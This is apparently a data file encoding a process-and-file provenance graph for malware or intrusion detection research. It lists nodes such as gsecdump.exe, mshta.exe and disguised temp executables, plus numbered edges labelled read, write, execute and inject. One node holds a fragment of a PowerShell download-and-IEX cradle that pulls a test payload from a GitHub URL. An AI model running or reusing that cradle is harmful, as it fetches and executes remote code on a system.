26
MP*-mshta.exe
SF-C:\Windows\system32\taskmgr
TF-C:\Users\admin\AppData\Roaming\damianocrnofj6793.exe
MF-C:\Users\admin\AppData\Local\Temp\EasyValorant.exe
MF-C:\Users\admin\AppData\Local\Temp\fast1nject.exe
TP-WtHgie
MP-cacls.exe
MF-C:\Windows\System32\wscript.exe
MP-dvRzzWRPw.exe
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
TF-\Windows\system32\makecab.exe
MF-Files\Hantek2xx2\STTubeDevice30.dll
MP-p2602380.exe
TP-jerkoff.exe 
TF-C:\Windows\System32\WScript.exe
MP*-gsecdump.exe
MF-\Users\admin\AppData\Local\Temp\PO-465514-180820.doc
SF-C:\Users\admin\AppData\Local\Temp\factura
TP*-suifsc.exe 
TP*-cmd.exe 
TP-msedge.exe
MP-nsA042.tmp
MP-pcalua.exe
MP-secedit.exe
SF-C:\Program files\appdata\local\temp\3893.bmp
TP-MV DESPINA.exe 
74
0 1 WR
0 2 RD
0 3 RD
0 4 EX
0 5 IJ
5 1 WR
5 2 UK
0 6 FR
6 1 EX
6 3 WR
6 4 UK
0 7 WR
0 8 FR
8 1 RD
8 3 RD
8 7 RD
0 9 ST
8 9 ST
0 10 RD
8 10 RD
8 11 EX
12 3 RD
12 7 RD
12 9 ST
12 10 RD
12 11 CD
13 3 WR
13 7 EX
8 13 IJ
13 9 ST
13 10 WR
13 11 EX
12 13 UK
8 14 RD
15 7 RD
9 15 RF
15 10 WR
15 11 WR
15 14 WR
8 16 RD
15 16 WR
8 17 WR
15 17 WR
8 18 IJ
18 9 ST
18 10 WR
18 11 WR
18 14 WR
15 18 IJ
18 16 WR
18 17 WR
9 19 RF
19 10 RD
19 11 RD
19 14 WR
15 19 IJ
19 16 RD
19 17 WR
18 19 IJ
20 10 WR
20 11 WR
20 14 WR
15 20 IJ
20 16 UK
21 11 UK
22 14 RD
15 22 UK
23 14 CD
23 17 RD
18 23 IJ
19 23 UK
18 24 EX
25 17 RD
18 25 UK

